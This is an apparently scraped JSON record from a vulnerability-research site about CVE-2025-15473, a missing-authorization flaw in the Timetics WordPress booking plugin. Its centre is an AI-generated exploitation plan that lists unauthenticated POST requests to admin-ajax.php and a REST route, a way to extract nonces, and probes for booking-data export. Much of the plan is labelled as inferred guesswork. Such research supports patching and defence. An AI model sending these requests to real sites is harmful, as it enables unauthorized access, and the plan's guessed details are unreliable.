[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjHTBb2Lj1uvS3a8fjmqOQZ3UPKIY3EfZs6hyX78ZUQE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2025-15473","timetics-appointment-booking-calendar-scheduling-system-missing-authorization","Timetics – Appointment Booking Calendar & Scheduling System \u003C 1.0.52 - Missing Authorization","The Timetics – Appointment Booking Calendar & Scheduling System plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to 1.0.52 (exclusive). This makes it possible for unauthenticated attackers to perform an unauthorized action.","timetics",null,"\u003C1.0.52","1.0.52","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-12 00:00:00","2026-03-19 15:38:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F950ef9f8-2700-4bab-90af-154fc9ed5bc6?source=api-prod",8,[22,23,24,25,26,27,28],"assets\u002Fcss\u002Ffeedback-modal.css","base\u002Fapi.php","base\u002Fcsv-reader.php","base\u002Fcustom-endpoint.php","base\u002Fexporter.php","base\u002Fforward-calls.php","base\u002Fpost-model.php","researched",false,3,"# Exploitation Research Plan - CVE-2025-15473 (Timetics Plugin)\n\n## 1. Vulnerability Summary\nThe **Timetics – Appointment Booking Calendar & Scheduling System** plugin (versions \u003C 1.0.52) contains a \"Missing Authorization\" vulnerability. Specifically, a function (likely associated with deactivation feedback or integration handling) fails to perform a capability check (e.g., `current_user_can( 'manage_options' )`) or a nonce check, allowing unauthenticated attackers (`PR:N`) to perform actions meant for administrators. Given the provided source file `assets\u002Fcss\u002Ffeedback-modal.css`, the vulnerability is highly likely located in the **deactivation feedback submission** logic, which is often implemented as an AJAX handler.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `timetics_deactivation_feedback` or `timetics_send_feedback` (inferred from `feedback-modal.css` and the `arraytics-wp-deactivation-feedback-modal` dependency).\n- **Alternative Endpoint:** A REST API route registered via `Timetics\\Base\\Api` subclasses.\n- **Authentication:** Unauthenticated (`PR:N`).\n- **Payload Parameters:**\n    - `action`: `timetics_deactivation_feedback`\n    - `reason_id`: (String\u002FInt) The ID of the feedback reason.\n    - `reason_text`: (String) Custom feedback text.\n    - `plugin_name`: `timetics` (inferred from standard Arraytics integration).\n- **Preconditions:** The plugin must be installed and active.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated HTTP POST request is sent to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2.  **Hook Registration:** The plugin registers a handler for the AJAX action using `add_action( 'wp_ajax_nopriv_timetics_deactivation_feedback', ... )` or fails to differentiate between `wp_ajax_` and `wp_ajax_nopriv_` in its registration logic.\n3.  **Missing Check:** The handler function executes. It fails to call `current_user_can()` to verify the requester is an administrator.\n4.  **Action Execution:** The function processes the feedback data, potentially sending it to a remote API or updating local options (e.g., dismissing a deactivation prompt).\n\n## 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce, it is likely localized for use in the admin or on pages where the feedback modal is triggered.\n1.  **Identify Shortcode:** Search for shortcodes that might render the booking calendar (which often enqueues the plugin's main scripts): `grep -r \"add_shortcode\" .`.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Booking\" --post_status=publish --post_content=\"[timetics-booking]\"\n    ```\n3.  **Extract Nonce via Browser:**\n    - Navigate to the new page.\n    - Use `browser_eval` to look for the localization object. In Timetics, this is often `timetics_script_obj` or `timetics_params`.\n    - **JS Command:** `browser_eval(\"window.timetics_script_obj?.nonce || window.timetics_params?.nonce\")`\n4.  **Bypass Check:** If `check_ajax_referer` is used with the default action `-1`, any valid nonce found on the page for *any* Timetics action may work.\n\n## 5. Exploitation Strategy\n### Primary Exploit: Unauthorized Feedback Submission\n1.  **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Host: TARGET_HOST\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=timetics_deactivation_feedback&reason_id=other&reason_text=Exploit_Verification_CVE_2025_15473&plugin_name=timetics\n    ```\n2.  **Expected Response:** A JSON success message like `{\"success\":true}` or `1`.\n\n### Secondary Exploit (REST API):\nCheck if the base REST class `Timetics\\Base\\Api` has unprotected implementations.\n1.  **HTTP Request:**\n    ```http\n    POST \u002Fwp-json\u002Ftimetics\u002Fv1\u002Ffeedback HTTP\u002F1.1\n    Host: TARGET_HOST\n    Content-Type: application\u002Fjson\n\n    {\n      \"reason_id\": \"bug\",\n      \"message\": \"Unauthenticated feedback\"\n    }\n    ```\n\n## 6. Test Data Setup\n1.  Install Timetics \u003C 1.0.52.\n2.  Activate the plugin.\n3.  Create a public page with a Timetics shortcode to ensure all scripts and possible nonces are initialized:\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_content='[timetics_appointment]'\n    ```\n\n## 7. Expected Results\n- The server returns a `200 OK` response with a body indicating success.\n- No \"403 Forbidden\" or \"Permissions Error\" is returned despite the request being unauthenticated.\n- If the plugin logs feedback internally (check `wp_options`), the injected feedback string should appear.\n\n## 8. Verification Steps\n1.  **Check for Nonce Check:**\n    ```bash\n    grep -rn \"check_ajax_referer\" .\n    ```\n    If the function associated with `timetics_deactivation_feedback` does not appear in the results, the nonce check is missing.\n2.  **Check for Capability Check:**\n    ```bash\n    grep -rn \"current_user_can\" .\n    ```\n    Verify the AJAX handler function does not contain this call.\n3.  **Check DB State:** If the exploit triggers a state change (e.g., `update_option`), verify it via WP-CLI:\n    ```bash\n    wp option get timetics_feedback_sent\n    ```\n\n## 9. Alternative Approaches\n- **Integration Endpoint:** `base\u002Fcustom-endpoint.php` registers `timetics-integration`. Attempt to access this via `\u002F?timetics-integration=1` or `\u002Ftimetics-integration\u002F` to see if any logic is triggered without authorization.\n- **CSV\u002FJSON Exporter:** Although CVSS says `C:N`, verify if `Exporter::export_csv` can be triggered via an AJAX action like `timetics_export_bookings`. If it returns data, it upgrades the vulnerability to an Information Disclosure.\n    - Payload: `action=timetics_export_bookings&format=csv`\n- **Notice Dismissal:** Search for actions like `timetics_dismiss_notice` which frequently lack authorization in similar plugins.","gemini-3-flash-preview","2026-04-18 04:12:40","2026-04-18 04:13:38",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.0.51","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags\u002F1.0.51","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftimetics.1.0.51.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags\u002F1.0.52","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftimetics.1.0.52.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags"]